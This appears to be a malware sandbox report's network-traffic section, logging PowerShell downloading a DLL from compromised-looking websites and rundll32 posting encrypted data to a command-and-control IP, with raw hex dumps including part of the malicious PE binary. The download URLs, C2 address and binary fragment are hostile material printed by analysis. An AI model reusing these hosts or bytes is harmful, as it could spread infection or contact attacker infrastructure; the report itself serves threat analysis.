                                            Data Raw: 31 30 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68
                                            Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width
                                            Jan 6, 2021 08:45:09.997236013 CET9INData Raw: 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22
                                            Data Ascii: =device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/c
                                            Jan 6, 2021 08:45:09.997247934 CET10INData Raw: 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e
                                            Data Ascii: class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworth
                                            Jan 6, 2021 08:45:09.997263908 CET11INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63
                                            Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
                                            Jan 6, 2021 08:45:09.997276068 CET11INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.2249167209.59.139.3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:10.223018885 CET12OUTGET /content/5f18Q/ HTTP/1.1
                                            Host: veterinariadrpopui.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:10.383809090 CET13INHTTP/1.1 500 Internal Server Error
                                            Date: Wed, 06 Jan 2021 07:45:10 GMT
                                            Server: Apache
                                            Content-Length: 7309
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>
                                            Jan 6, 2021 08:45:10.383841038 CET14INData Raw: 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a
                                            Data Ascii:
                                            Jan 6, 2021 08:45:10.383866072 CET16INData Raw: 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20
                                            Data Ascii:
                                            Jan 6, 2021 08:45:10.383888006 CET17INData Raw: 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20
                                            Data Ascii:
                                            Jan 6, 2021 08:45:10.383907080 CET19INData Raw: 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20
                                            Data Ascii:
                                            Jan 6, 2021 08:45:10.383925915 CET19INData Raw: 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.2249168210.86.239.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:12.797415972 CET21OUTGET /wordpress/CGMC/ HTTP/1.1
                                            Host: khanhhoahomnay.net
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:13.071660995 CET22INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 06 Jan 2021 07:45:13 GMT
                                            Content-Type: application/octet-stream
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Keep-Alive: timeout=60
                                            X-Powered-By: PHP/7.4.9
                                            Set-Cookie: 5ff56a8915748=1609919113; expires=Wed, 06-Jan-2021 07:46:13 GMT; Max-Age=60; path=/
                                            Cache-Control: no-cache, must-revalidate
                                            Pragma: no-cache
                                            Last-Modified: Wed, 06 Jan 2021 07:45:13 GMT
                                            Expires: Wed, 06 Jan 2021 07:45:13 GMT
                                            Content-Disposition: attachment; filename="rJGdausK.dll"
                                            Content-Transfer-Encoding: binary
                                            Data Raw: 31 64 64 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: 1dd7MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
                                            Jan 6, 2021 08:45:13.071696997 CET23INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: U
                                            Jan 6, 2021 08:45:13.071721077 CET25INData Raw: cc cc cc cc cc cc e9 cb 10 00 00 cc cc cc cc cc cc cc cc cc cc cc e9 1b 14 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 08 8b 1f 8b 77 04 83 bb 84 00 00 00 00 89 75 08 0f 84 48 01 00 00 8b 9b 80 00 00 00 03 de 6a 14 53
                                            Data Ascii: USVW}wuHjS],ICw(PGuGPwGOGtE4KsutE+Mw(1y
                                            Jan 6, 2021 08:45:13.071741104 CET26INData Raw: 8b 75 08 85 f6 74 7c 83 7e 10 00 74 11 8b 06 8b 4e 04 8b 40 28 6a 00 6a 00 51 03 c1 ff d0 83 7e 08 00 74 3a 57 33 ff 39 7e 0c 7e 1c 8b 46 08 8b 04 b8 85 c0 74 0c ff 76 28 50 8b 46 24 ff d0 83 c4 08 47 3b 7e 0c 7c e4 8b 46 08 5f 85 c0 74 0e 68 00
                                            Data Ascii: ut|~tN@(jjQ~t:W39~~Ftv(PF$G;~|F_thjPFthjPVjxPt^]UEHMx|ujl3]PxDUEtztSVuWuB;r]+rr Z$3
                                            Jan 6, 2021 08:45:13.071764946 CET27INData Raw: 00 00 03 d9 89 5d 08 8b 03 85 c0 74 65 56 57 8d 49 00 03 c1 8d 7b 04 89 45 fc 8b 07 83 e8 08 33 f6 8d 53 08 a9 fe ff ff ff 76 3a 8b 5d fc 8d 64 24 00 0f b7 02 8b c8 81 e1 00 f0 00 00 81 f9 00 30 00 00 75 0b 8b 4d 0c 25 ff 0f 00 00 01 0c 18 8b 07
                                            Data Ascii: ]teVWI{E3Sv:]d$0uM%F;r]M]u_^[]UUtEVu+@Ju^]VF8FLNtQPFNtQPFN
                                            Jan 6, 2021 08:45:13.071787119 CET29INData Raw: 10 53 68 c0 d4 00 10 6a 01 6a 00 68 b0 d4 00 10 ff 15 c0 d1 00 10 85 c0 0f 88 b2 00 00 00 8b 0b 0f 57 c0 66 0f d6 45 f0 b8 0d 00 00 00 66 89 45 f0 8b 45 0c 66 0f d6 45 f8 f3 0f 7e 45 f0 89 45 f8 8d 45 08 50 83 ec 10 8b c4 c7 45 08 00 00 00 00 8b
                                            Data Ascii: ShjjhWfEfEEfE~EEEPEf~EQf@u=f}u6O=x-UOQhRxEG_^[]@tQP_^[]_^[]3
                                            Jan 6, 2021 08:45:13.071801901 CET29INData Raw: 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 10 8b 55 0c 56 57 ff 75 14 8b 7d 08 85 c0 8b 37 0f 45 d0 52 57 89 4d fc ff 96 94 00 00 00 85 c0 74 3a 8b 45 fc 8d 55 08 8b 40 18 52 ff 75 0c c7 45 08 00 00 00 00 8b 08 50 ff 91 bc 00 00
                                            Data Ascii: ]UQEUVWu}7ERWMt:EU@RuEPxuuWPTMQR_^]UQS{CuFPhtEx5VWX
                                            Jan 6, 2021 08:45:13.071822882 CET31INData Raw: 32 30 30 30 0d 0a d3 00 10 bf 05 00 00 00 90 56 8b cb e8 c8 01 00 00 83 c6 0c 4f 75 f2 8b cb e8 1b 00 00 00 8b cb e8 74 03 00 00 8b 45 fc 5f 5e 5b 8b e5 5d c3 33 c0 5b 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 5c a1 58 21 01 10 33 c5 89 45 fc 8b c1 8d
                                            Data Ascii: 2000VOutE_^[]3[]U\X!3EME@QEhPLEEVURPQ %W39}SlEUREWPQEEURhPEUWRfEf
                                            Jan 6, 2021 08:45:13.071844101 CET32INData Raw: f0 85 f6 78 45 83 7d e4 02 75 3f 8b 43 1c 8d 55 d0 52 0f 57 c0 8d 55 e8 66 0f d6 45 d0 66 0f d6 45 d8 8b 08 52 50 ff 51 14 8b f0 85 f6 78 1b 8d 45 d0 50 8d 45 e8 50 8b cb e8 27 00 00 00 8b f0 8d 45 d0 50 ff 15 b0 d1 00 10 47 85 f6 79 86 8b c6 8b
                                            Data Ascii: xE}u?CURWUfEfERPQxEPEP'EPGyM_^3[]UHX!3ESVuW}hjP?hPVxPWdCRPv
                                            Jan 6, 2021 08:45:13.071908951 CET33INData Raw: 00 83 c4 10 85 c0 78 0b 3d ff 01 00 00 77 04 75 0d eb 05 be 7a 00 07 80 33 c0 66 89 45 fa 85 f6 0f 88 84 00 00 00 ff 75 18 ff 15 a0 d0 00 10 03 c0 50 ff 75 18 8d 85 fc fb ff ff 6a 01 ff b5 f4 fb ff ff 50 53 ff 15 00 d0 00 10 8b f0 85 f6 7e 0b 0f
                                            Data Ascii: x=wuz3fEuPujPS~xLju=jh|WthWuhWtjM_^3[R]UX!3EES]VEW}
                                            Jan 6, 2021 08:45:13.336631060 CET35INData Raw: 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76
                                            Data Ascii: ^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v|ovfsvs~vf;u


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.22491695.2.136.9080C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:31.116019964 CET221OUTPOST /6tycsc/ HTTP/1.1
                                            DNT: 0
                                            Referer: 5.2.136.90/6tycsc/
                                            Content-Type: multipart/form-data; boundary=----------OGLPvif2cE
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 5.2.136.90
                                            Content-Length: 7412
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jan 6, 2021 08:45:31.116136074 CET222OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4f 47 4c 50 76 69 66 32 63 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 48 6a 4c 4e 72 72 79 62 6f 22 3b 20 66 69 6c 65 6e 61
                                            Data Ascii: ------------OGLPvif2cEContent-Disposition: form-data; name="HjLNrrybo"; filename="dmtBLNODptefp"Content-Type: application/octet-stream(#Q0.~z4oiM&ghc:c(kY%|A-80dJD8mID
                                            Jan 6, 2021 08:45:31.189213991 CET226OUTData Raw: 35 14 13 59 a4 b0 06 08 ab c8 af f7 88 fb eb 77 56 36 86 d9 fc 9f 7a 22 be c3 e8 6e 48 eb bb a6 86 c6 1b f0 d3 0a fd 37 31 a9 c6 cb 9a 9d 7e 7d 69 55 df ff 26 67 e3 fd a4 e4 19 fc e5 34 17 bf cd 99 22 db 5c 9c 99 6a e0 01 91 b9 15 25 07 e3 6c c3
                                            Data Ascii: 5YwV6z"nH71~}iU&g4"\j%lF%Rg?XQbP4nW[>7\]i]LGw)*Q0+OE.)X0tK4}uKicn3k6IhWk1'W2A1],ZQC(nar"Ui
                                            Jan 6, 2021 08:45:31.262192965 CET229OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 6, 2021 08:45:31.780097008 CET230INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 06 Jan 2021 07:45:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Data Raw: 61 35 34 0d 0a 7c d6 a8 f0 04 31 54 77 06 10 86 e0 e6 d2 54 af 79 da 34 36 cf d8 fa cb e9 89 cd 1a 22 2b fb d4 41 e9 5e dc 9d 15 ab 29 ce dd 43 a9 ae be 22 cc 93 4b 54 86 16 a5 9b df 45 0f 1a 84 24 d8 2e 49 fd 73 0d 21 c7 b2 b7 fc 54 d3 1a c3 1e e5 f7 5f 53 49 74 db 10 77 de b3 27 09 61 c3 c8 a6 8c 03 b4 27 52 24 81 cc 41 7f b5 d6 b0 5d 4a 16 a7 8b 07 e0 18 b2 60 5c 41 33 7e bf d0 03 87 dd 81 90 24 50 18 44 1d 82 d1 8f 88 c8 91 c9 7a 2b 84 b4 c3 57 a6 de 9d 86 92 81 9b be 08 5d 8f 17 5f ab 85 52 9f 01 d5 2f 13 19 3f 74 9d 2c 4b 51 78 ab fd 68 ad 85 65 3a 18 4d 14 b8 c2 e2 ce ce 78 f7 22 fe c0 d3 bc 0f ea b6 44 bb f9 86 7f 08 75 b6 d1 86 e0 6f 9e 5b 58 56 aa 59 6d 7c 78 66 b1 14 0d 89 a8 2e 2e c7 87 87 fb 65 8a 2e 3f a8 f7 68 a1 18 1f 23 4f 03 87 74 26 17 aa 7e 1a 88 2a a9 f0 01 f7 d8 be 69 0b 5e 8e 9a 99 3c 21 a2 72 96 b9 7f f3 50 aa a8 94 a0 0b 99 20 7c 4c 0d f2 fc a4 b9 0c d7 34 db db 4f a9 b9 fe ad 7d 20 86 86 47 77 e1 d2 19 a7 61 0e c6 0e 2f d2 f5 53 e9 08 62 51 b8 dc 5a 84 03 4f 10 d7 59 03 2e 3c e1 08 47 a9 f1 e4 4d 88 94 d4 e4 c5 fc 9d 1f a7 b3 b2 2e 1f 06 79 98 27 ef 34 f3 db ad 02 1c c8 8b 71 9d c3 f8 d7 31 1f 7f cb 86 df 93 09 e7 63 9c 5f b6 23 d3 f7 3a 2f 11 18 4d cc fc 0d 1b b6 d7 75 53 b4 97 c0 14 f6 da ae 02 d3 fc cb 3c e4 30 27 18 28 53 5b ef 41 00 c1 65 17 b3 fc 03 cd 60 89 9b 07 a1 66 09 7e 2d 3c e5 1d 92 2f ab 8a 02 78 63 c8 49 47 cc 3d 98 17 aa 99 b0 77 71 2c f1 14 8b fe 22 0e 8d 99 18 79 06 93 24 ad 8f 75 54 d8 f0 4e 5e c5 a2 4d 7d 73 18 e2 2b a1 0c fb cc 9c 7b a2 a0 99 c2 07 6e dc 71 de 7b db c6 cc 65 86 5c 04 30 2b 09 8c 26 bf 33 bc 95 23 